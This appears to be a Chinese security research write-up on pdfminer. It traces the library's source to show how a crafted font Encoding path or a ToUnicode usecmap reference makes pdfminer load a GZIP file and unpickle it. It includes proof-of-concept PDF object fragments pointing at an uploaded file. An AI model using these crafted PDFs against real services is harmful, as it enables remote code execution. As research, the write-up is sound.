class PDFCIDFont(PDFFont): def get_cmap_from_spec(self, spec: Mapping[str, Any], strict: bool) -> CMapBase: """Get cmap from font specification
For certain PDFs, Encoding Type isn't mentioned as an attribute of Encoding but as an attribute of CMapName, where CMapName is an attribute of spec['Encoding']. The horizontal/vertical modes are mentioned with different name such as 'DLIdent-H/V','OneByteIdentityH/V','Identity-H/V'. """ cmap_name = self._get_cmap_name(spec, strict)
try: return CMapDB.get_cmap(cmap_name) except CMapDB.CMapNotFound as e: if strict: raise PDFFontError(e) return CMap()
class PDFCIDFont(PDFFont): def _get_cmap_name(spec: Mapping[str, Any], strict: bool) -> str: """Get cmap name from font specification""" cmap_name = "unknown" # default value
try: spec_encoding = spec["Encoding"] if hasattr(spec_encoding, "name"): cmap_name = literal_name(spec["Encoding"]) else: cmap_name = literal_name(spec_encoding["CMapName"]) except KeyError: if strict: raise PDFFontError("Encoding is unspecified")
if type(cmap_name) is PDFStream: # type: ignore[comparison-overlap] cmap_name_stream: PDFStream = cast(PDFStream, cmap_name) if "CMapName" in cmap_name_stream: cmap_name = cmap_name_stream.get("CMapName").name else: if strict: raise PDFFontError("CMapName unspecified for encoding")
class PDFPageInterpreter: def init_resources(self, resources: Dict[object, object]) -> None: self.resources = resources self.fontmap: Dict[object, PDFFont] = {} self.xobjmap = {} self.csmap: Dict[str, PDFColorSpace] = PREDEFINED_COLORSPACE.copy() if not resources: return
def get_colorspace(spec: object) -> Optional[PDFColorSpace]: if isinstance(spec, list): name = literal_name(spec[0]) else: name = literal_name(spec) if name == "ICCBased" and isinstance(spec, list) and 2 <= len(spec): return PDFColorSpace(name, stream_value(spec[1])["N"]) elif name == "DeviceN" and isinstance(spec, list) and 2 <= len(spec): return PDFColorSpace(name, len(list_value(spec[1]))) else: return PREDEFINED_COLORSPACE.get(name)
for (k, v) in dict_value(resources).items(): log.debug("Resource: %r: %r", k, v) if k == "Font": for (fontid, spec) in dict_value(v).items(): objid = None if isinstance(spec, PDFObjRef): objid = spec.objid spec = dict_value(spec) self.fontmap[fontid] = self.rsrcmgr.get_font(objid, spec) elif k == "ColorSpace": for (csid, spec) in dict_value(v).items(): colorspace = get_colorspace(resolve1(spec)) if colorspace is not None: self.csmap[csid] = colorspace elif k == "ProcSet": self.rsrcmgr.get_procset(list_value(v)) elif k == "XObject": for (xobjid, xobjstrm) in dict_value(v).items(): self.xobjmap[xobjid] = xobjstrm return
def extract_text( pdf_file: FileOrName, password: str = "", page_numbers: Optional[Container[int]] = None, maxpages: int = 0, caching: bool = True, codec: str = "utf-8", laparams: Optional[LAParams] = None, ) -> str: """Parse and return the text contained in a PDF file.
:param pdf_file: Either a file path or a file-like object for the PDF file to be worked on. :param password: For encrypted PDFs, the password to decrypt. :param page_numbers: List of zero-indexed page numbers to extract. :param maxpages: The maximum number of pages to parse :param caching: If resources should be cached :param codec: Text decoding codec :param laparams: An LAParams object from pdfminer.layout. If None, uses some default settings that often work well. :return: a string containing all of the text extracted. """ if laparams is None: laparams = LAParams()
with open_filename(pdf_file, "rb") as fp, StringIO() as output_string: fp = cast(BinaryIO, fp) # we opened in binary mode rsrcmgr = PDFResourceManager(caching=caching) device = TextConverter(rsrcmgr, output_string, codec=codec, laparams=laparams) interpreter = PDFPageInterpreter(rsrcmgr, device)
for page in PDFPage.get_pages( fp, page_numbers, maxpages=maxpages, password=password, caching=caching, ): interpreter.process_page(page)
:param pdf_file: Either a file path or a file-like object for the PDF file to be worked on. :param password: For encrypted PDFs, the password to decrypt. :param page_numbers: List of zero-indexed page numbers to extract. :param maxpages: The maximum number of pages to parse :param caching: If resources should be cached :param laparams: An LAParams object from pdfminer.layout. If None, uses some default settings that often work well. :return: LTPage objects """ if laparams is None: laparams = LAParams()
with open_filename(pdf_file, "rb") as fp: fp = cast(BinaryIO, fp) # we opened in binary mode resource_manager = PDFResourceManager(caching=caching) device = PDFPageAggregator(resource_manager, laparams=laparams) interpreter = PDFPageInterpreter(resource_manager, device) for page in PDFPage.get_pages( fp, page_numbers, maxpages=maxpages, password=password, caching=caching, ): interpreter.process_page(page) layout = device.get_result() yield layout
溯源整个流程,从 extract_ 双方法开始。PDFPage.get_pages() 会通过 PDFParser 解析 PDF 文件,并生成一个 PDFDocument 对象。这个对象包含了文档的结构和元数据。然后迭代文档中的每一页,并调用 create_pages(doc) 来生成具体的页面对象。然后提取的 PDF 元数据交给下游方法处理
class PDFPage: def get_pages( cls, fp: BinaryIO, pagenos: Optional[Container[int]] = None, maxpages: int = 0, password: str = "", caching: bool = True, check_extractable: bool = False, ) -> Iterator["PDFPage"]: parser = PDFParser(fp) doc = PDFDocument(parser, password=password, caching=caching) if not doc.is_extractable: if check_extractable: error_msg = "Text extraction is not allowed: %r" % fp raise PDFTextExtractionNotAllowed(error_msg) else: warning_msg = ( "The PDF %r contains a metadata field " "indicating that it should not allow " "text extraction. Ignoring this field " "and proceeding. Use the check_extractable " "if you want to raise an error in this case" % fp ) log.warning(warning_msg) for pageno, page in enumerate(cls.create_pages(doc)): if pagenos and (pageno not in pagenos): continue yield page if maxpages and maxpages <= pageno + 1: break
将 PDF Font 对象关键字段定义好,Type = Type0、Subtype = CIDFontType0 or CIDFontType2、Encoding = GZIP 文件绝对路径,同时绝对路径中 /需要替换为 #2F,并使用 extract_pages()/extract_text() 操作 PDF 文件,Pdfminer 就会读取 GZIP 内容并反序列化 PDF 格式体利用示例
xref 0 7 0000000000 65535 f 0000000010 00000 n 0000000077 00000 n 0000000176 00000 n 0000000273 00000 n 0000000325 00000 n 0000000375 00000 n trailer << /Size 7 /Root 1 0 R >> startxref 410 %%EOF
ToUnicode usecmap
上面是 Type0 Font Encoding 的攻击路径,pickle.loads 还有第二条触发链:ToUnicode usecmap。 PDFSimpleFont 初始化时会处理 /ToUnicode 字段,ToUnicode 是 PDF 中用于字符编码映射的 CMap 流。pdffont.py::PDFSimpleFont.init() 在 Line 970 读取 ToUnicode 流内容并交给 CMapParser 解析
1 2 3 4 5 6 7 8 9 10 11 12
class PDFSimpleFont(PDFFont): def __init__( self, descriptor: PDFObjRef, widths: object, spec: MutableMapping[str, Any], ) -> None: # ... if "ToUnicode" in spec: strm = stream_value(spec["ToUnicode"]) self.unicode_map = FileUnicodeMap() CMapParser(self.unicode_map, BytesIO(strm.get_data())).run() # Line 970
6 0 obj << /Length 95 >> stream /CIDInit /ProcSet findresource begin /#2Fproc#2Fself#2Fcwd#2Fuploads#2Fl1 usecmap end endstream endobj
xref 0 7 0000000000 65535 f 0000000015 00000 n 0000000064 00000 n 0000000121 00000 n 0000000259 00000 n 0000000355 00000 n 0000000447 00000 n trailer << /Size 7 /Root 1 0 R >> startxref 592 %%EOF
在看 Pdfminer 的图片提取与写入功能时发现的逻辑缺陷,虽然没软用简单扯一嘴 当使用 Pdfminer 提取 PDF 中的图片时,通常可以这样调用
1 2 3 4 5 6
for page in extract_pages(pdf_file): for element in page: if isinstance(element, LTFigure): for item in element: if isinstance(item, LTImage): result = writer.export_image(item)
Pdfminer 会将 PDF 中的图片保存到指定目录。但问题来了,保存时文件名经过怎样的处理呢? 通过阅读源码,我发现了关键的逻辑在ImageWriter.create_unique_image_name中:
elif image.bits == 8 and ( LITERAL_DEVICE_RGB in image.colorspace or LITERAL_INLINE_DEVICE_RGB in image.colorspace ): name = self._save_bmp(image, width, height, width * 3, image.bits * 3)
elif image.bits == 8 and ( LITERAL_DEVICE_GRAY in image.colorspace or LITERAL_INLINE_DEVICE_GRAY in image.colorspace ): name = self._save_bmp(image, width, height, width, image.bits)
elif len(filters) == 1 and filters[0][0] in LITERALS_FLATE_DECODE: name = self._save_bytes(image)